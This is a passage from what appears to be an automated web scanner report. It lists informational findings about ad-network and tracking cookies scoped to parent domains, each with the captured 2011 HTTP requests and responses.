A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 16:02:17 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=768033/size=300250/u=2/bnum=41330653/hr=16/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315342934886&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1017217.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 16:02:17 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 561
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:02:17 GMT
Connection: close
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 16:02:17 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=4
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=64844327/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:41:40 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=768033/size=300250/u=2/bnum=64844327/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315341697956&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1017217.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 15:41:40 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 561
Date: Tue, 06 Sep 2011 15:41:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:41:40 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=6
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=70609416/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:21:07 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=768033/size=300250/u=2/bnum=70609416/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315340464698&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1017217.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 15:21:07 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 561
Date: Tue, 06 Sep 2011 15:21:07 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:21:07 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=7863048/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:15:56 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=768033/size=300250/u=2/bnum=7863048/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315340154901&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1017217.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 15:15:56 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 559
Date: Tue, 06 Sep 2011 15:15:56 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:15:56 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=80753902/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:31:23 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=768033/size=300250/u=2/bnum=80753902/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315341080962&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1017217.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 15:31:23 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 561
Date: Tue, 06 Sep 2011 15:31:23 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:31:23 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=8
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=92276994/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:57:07 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=768033/size=300250/u=2/bnum=92276994/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315342624689&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1017217.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 15:57:07 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 561
Date: Tue, 06 Sep 2011 15:57:07 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:57:07 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=9
...[SNIP]...

12.60. http://rt.legolas-media.com/lgrt previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rt.legolas-media.com
Path:	/lgrt

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

lgtix=BgABADMBSQABADMBHAAGADUBDAABADMB/QABADABXwABADMB; path=/; expires=Fri, 05 Sep 2014 14:55:10 GMT; domain=.legolas-media.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lgrt?ci=2&ei=9&ti=28&pbi=37 HTTP/1.1
Host: rt.legolas-media.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ui=5ea31fa9-d42d-458f-9bb4-1700d69738c0; lgpr=//8=; lgtix=BgABADMBSQABADMBHAAEADUBDAABADMB/QABADABXwABADMB

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:55:10 GMT
Server: Apache
Expires: -1
Cache-Control: no-cache; no-store
Content-Type: application/javascript
Set-Cookie: lgtix=BgABADMBSQABADMBHAAGADUBDAABADMB/QABADABXwABADMB; path=/; expires=Fri, 05 Sep 2014 14:55:10 GMT; domain=.legolas-media.com
P3P: policyref="http://www.legolas-media.com/w3c/p3p.xml",CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Length: 5
Connection: close

true;

12.61. http://search.spotxchange.com/track/tag/6382.1008/img previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://search.spotxchange.com
Path:	/track/tag/6382.1008/img

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

history-0=eNrVkttygjAQhq%2Ftu7STEMXSOygBwxQyxcghdxi0BhCY6UHJ0zdKDw%2FQ2pleJrv%2Fv%2F9%2Bs8z2byCE08mdY06vlzgm9gPh2L3LWado%2B6JohRWVARB7ryqM5pVDC2wypyHVqRaapI13fCBzobpj6HayyCJVpsmW%2Bx7gSzIvmP5XGFAmUKjIjKLQjFgny733XKYrSQ1sRlU%2F6lUn8zQ2eBYA7dOIxur5%2FdkbUEmMyBVonIsNnanOs3iXIWdYI95zPxkyo6nHum0S%2BZ1JLII3joLdOvnyg1qvhK93Gd8nP5Cn5bZIH3Wm2gwZPkbuedb0syb2ScXTWbVJrGazcHrR1h%2B95HDeS%2Bcvfa%2FNUKJOu2tfNWqFpAhaEzbSnl2etlsPkbsC%2F4o2uwRtAG4vTRvqu1aRm6Of0A7V0%2FB3tO0D%2FeXbvnoHx%2BZvDQ%3D%3D; expires=Wed, 04-Jan-2012 15:37:47 GMT; path=/; domain=.spotxchange.com
partner-0=eNptzMEKgjAYAOBzvUtg21gldDBmstH2ow7dvOUgmGV2CGR7%2BsRz1%2B%2FwUXI6btILJbs6r3h2413OUqunCO9vhCHH4MVsjUj6sQkGN7Ez4tEV18TW%2FODiNIPnHrCkUmeUjw1xxStYU316RDyg5%2BIyKF1iqTlSw3ru%2F533tlwfYJOX2gXJMqSYWyw5b38XazTo; expires=Wed, 04-Jan-2012 15:37:47 GMT; path=/; domain=.spotxchange.com
user-0=dXNlcl9ndWlkCTk2NDgyYjhkZTEyYThhMjlhN2U3NjkyMzlmZGY0M2E1CWNvb2tpZV9kb21haW4Jc2VhcmNoLnNwb3R4Y2hhbmdlLmNvbQljcmVhdGVkX2RhdGUJMTMxNDg0NzQ1Mwltb2RpZmllZF9kYXRlCTEzMTUzMjM0NjcK; expires=Thu, 06-Sep-2012 15:37:47 GMT; path=/; domain=.spotxchange.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /track/tag/6382.1008/img HTTP/1.1
Host: search.spotxchange.com
Proxy-Connection: keep-alive
Referer: http://img-cdn.mediaplex.com/0/17353/universal.html?page_name=netsuite_homepage&NetSuite_Homepage=1&mpuid=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: history-0=eNrVUMtugzAQPKf%2F0srghIjcQjHEqGCVOGB8I4YIAwGkvoK%2Fvg6k7Q%2B0hx53Z2d2ZujWfzAMY7nYONbyfo9ivH3CHLmbjPaKdK%2BK1EgRGQBx9urcbN%2B4YYOSOS2ur1ho4S6u%2BIjXQvWX0O1lziJVpMmJ%2Bx7ge7zOqd4rBAgVMFR4RWBoRbSXxdl7KdKDJCayonqY%2BaqXWRqbnAVA67SitQf%2BOGkDIrEZuQLOf5GpPTUZiysGnfEI%2BcD9ZGRm28z41sLyx5PYBe8cBtUx%2BdYzNF8JX2eZ56seyNLilKfP2lNjhRRdInf6tfzCxDmpebqqy8Ruy50ziK653eKPKZf2X%2Fhex2Cirtm1rpq5QhJo2As6t736%2B7bdZozcA%2FhXbdPfbfvuEyw79EU%3D; user-0=dXNlcl9ndWlkCTk2NDgyYjhkZTEyYThhMjlhN2U3NjkyMzlmZGY0M2E1CWNvb2tpZV9kb21haW4Jc2VhcmNoLnNwb3R4Y2hhbmdlLmNvbQljcmVhdGVkX2RhdGUJMTMxNDg0NzQ1Mwltb2RpZmllZF9kYXRlCTEzMTUxMDMyNjMK; partner-0=eNptzMEKgjAYAOBzvUtg21gldDBmstH2ow7dvOUgmGV2CGR7%2BsRz1%2B%2FwUXI6btILJbs6r3h2413OUqunCO9vhCHH4MVsjUj6sQkGN7Ez4tEV18TW%2FODiNIPnHrCkUmeUjw1xxStYU316RDyg5%2BIyKF1iqTlSw3ru%2F533tlwfYJOX2gXJMqSYWyw5b38XazTo

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 15:37:47 GMT
Server: Apache
P3P: CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV ADMa"
Set-Cookie: history-0=eNrVkttygjAQhq%2Ftu7STEMXSOygBwxQyxcghdxi0BhCY6UHJ0zdKDw%2FQ2pleJrv%2Fv%2F9%2Bs8z2byCE08mdY06vlzgm9gPh2L3LWado%2B6JohRWVARB7ryqM5pVDC2wypyHVqRaapI13fCBzobpj6HayyCJVpsmW%2Bx7gSzIvmP5XGFAmUKjIjKLQjFgny733XKYrSQ1sRlU%2F6lUn8zQ2eBYA7dOIxur5%2FdkbUEmMyBVonIsNnanOs3iXIWdYI95zPxkyo6nHum0S%2BZ1JLII3joLdOvnyg1qvhK93Gd8nP5Cn5bZIH3Wm2gwZPkbuedb0syb2ScXTWbVJrGazcHrR1h%2B95HDeS%2Bcvfa%2FNUKJOu2tfNWqFpAhaEzbSnl2etlsPkbsC%2F4o2uwRtAG4vTRvqu1aRm6Of0A7V0%2FB3tO0D%2FeXbvnoHx%2BZvDQ%3D%3D; expires=Wed, 04-Jan-2012 15:37:47 GMT; path=/; domain=.spotxchange.com
Set-Cookie: partner-0=eNptzMEKgjAYAOBzvUtg21gldDBmstH2ow7dvOUgmGV2CGR7%2BsRz1%2B%2FwUXI6btILJbs6r3h2413OUqunCO9vhCHH4MVsjUj6sQkGN7Ez4tEV18TW%2FODiNIPnHrCkUmeUjw1xxStYU316RDyg5%2BIyKF1iqTlSw3ru%2F533tlwfYJOX2gXJMqSYWyw5b38XazTo; expires=Wed, 04-Jan-2012 15:37:47 GMT; path=/; domain=.spotxchange.com
Set-Cookie: user-0=dXNlcl9ndWlkCTk2NDgyYjhkZTEyYThhMjlhN2U3NjkyMzlmZGY0M2E1CWNvb2tpZV9kb21haW4Jc2VhcmNoLnNwb3R4Y2hhbmdlLmNvbQljcmVhdGVkX2RhdGUJMTMxNDg0NzQ1Mwltb2RpZmllZF9kYXRlCTEzMTUzMjM0NjcK; expires=Thu, 06-Sep-2012 15:37:47 GMT; path=/; domain=.spotxchange.com
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 15:37:47 GMT
Cache-Control: no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Location: http://cdn.spotxchange.com/media/thumbs/pixel/pixel.gif
Content-Type: text/html
Content-Length: 0

12.62. http://server.iad.liveperson.net/hc/52793056/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://server.iad.liveperson.net
Path:	/hc/52793056/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

LivePersonID=-5110247826455-1315323140:-1:-1:-1:-1; expires=Wed, 05-Sep-2012 15:32:31 GMT; path=/hc/52793056; domain=.liveperson.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hc/52793056/?&site=52793056&cmd=mTagKnockPage&lpCallId=802803296362-872958060353&protV=20&lpjson=1&id=5840223757&javaSupport=true&visitorStatus=INSITE_STATUS HTTP/1.1
Host: server.iad.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.tenzing.com/atg-ecommerce-hosting.asp?utm_source=PG0008-ATG-Solutions&utm_campaign=001&utm_content=01&utm_term=%2BATG%20%2Bsolutions&utm_medium=PPC
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=5110247826455,d=1314795678

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:31 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickACTIVE=1315323151587; expires=Wed, 07-Sep-2011 15:32:31 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Tue, 06 Sep 2011 15:32:31 GMT
Set-Cookie: HumanClickSiteContainerID_52793056=STANDALONE; path=/hc/52793056
Set-Cookie: LivePersonID=-5110247826455-1315323140:-1:-1:-1:-1; expires=Wed, 05-Sep-2012 15:32:31 GMT; path=/hc/52793056; domain=.liveperson.net
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 1484

lpConnLib.Process({"ResultSet": {"lpCallId":"802803296362-872958060353","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'server.iad.liveper
...[SNIP]...

12.63. http://services.krxd.net/geoip previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://services.krxd.net
Path:	/geoip

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ServedBy=logger-b003; path=/; domain=.krxd.net; expires=Mon, 05-Mar-2012 04:20:27 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /geoip?root_name=KRUX.ST.geo HTTP/1.1
Host: services.krxd.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=28800
Content-Type: text/javascript
Date: Tue, 06 Sep 2011 15:00:27 GMT
